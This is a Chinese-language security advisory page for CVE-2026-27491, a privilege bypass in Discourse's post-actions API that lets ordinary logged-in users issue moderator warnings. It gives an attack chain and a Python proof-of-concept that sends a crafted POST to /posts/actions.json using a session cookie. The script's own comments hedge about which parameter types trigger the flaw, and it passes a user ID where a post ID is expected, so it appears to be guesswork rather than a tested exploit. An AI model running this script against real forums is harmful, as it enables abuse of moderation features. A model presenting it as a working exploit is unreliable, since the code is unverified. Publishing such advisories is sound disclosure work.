CVE-2026-27491 CVSS 4.3 中危

CVE-2026-27491: Discourse类型强制漏洞致非管理员可发警告

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27491

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Discourse

漏洞概述

Discourse是一个开源讨论平台。在特定版本之前，其帖子操作API端点存在类型强制问题。该漏洞允许已登录的非管理员用户通过发送特制请求，向其他用户发出警告。警告本应是仅限管理员使用的审核功能。尽管存在权限绕过，但漏洞不涉及数据泄露或完全的权限提升，仅限于创建未授权的用户警告。

技术细节

该漏洞根本原因在于Discourse帖子操作API端点中的类型强制缺陷。攻击者利用已登录账户，向API发送特制的HTTP请求，利用数据类型处理的逻辑漏洞，欺骗后端验证机制。虽然警告功能严格限制为员工权限，但由于类型校验不严，普通用户可绕过此限制。成功利用后，攻击者可为任意用户添加警告标记，干扰论坛管理秩序。该漏洞未暴露敏感数据，也未允许攻击者获取管理员控制权，属于低影响范围的逻辑漏洞。

攻击链分析

STEP 1

1. 身份认证

攻击者注册并登录Discourse平台，获取有效的用户会话凭证。

STEP 2

2. 目标识别

确定要攻击的目标用户或帖子ID。

STEP 3

3. 构造恶意请求

利用API端点的类型强制缺陷，构造包含特定参数类型的特制HTTP POST请求。

STEP 4

4. 执行攻击

向/posts/actions端点发送请求，绕过权限检查，触发警告功能。

STEP 5

5. 结果确认

目标用户收到非授权的系统警告。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
TARGET_URL = "https://example.com/posts/actions.json"
SESSION_COOKIE = "valid_user_session_cookie"
TARGET_USER_ID = "123"

# Headers
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Cookies
cookies = {
    "_t_session": SESSION_COOKIE
}

# Exploit Payload: Type coercion to bypass staff check
# Sending parameters as string where integer might be expected or vice-versa
data = {
    "id": TARGET_USER_ID,
    "post_action_type_id": "4", 
    "flag_topic": "false"
}

try:
    response = requests.post(TARGET_URL, headers=headers, cookies=cookies, data=data)
    if response.status_code == 200:
        print("[+] Warning potentially issued successfully.")
    else:
        print(f"[-] Failed. Status code: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

影响范围

Discourse < 2026.3.0-latest.1

Discourse < 2026.2.1

Discourse < 2026.1.2

防御指南

临时缓解措施

官方暂无已知的临时缓解措施，建议立即升级至修复版本以封堵漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表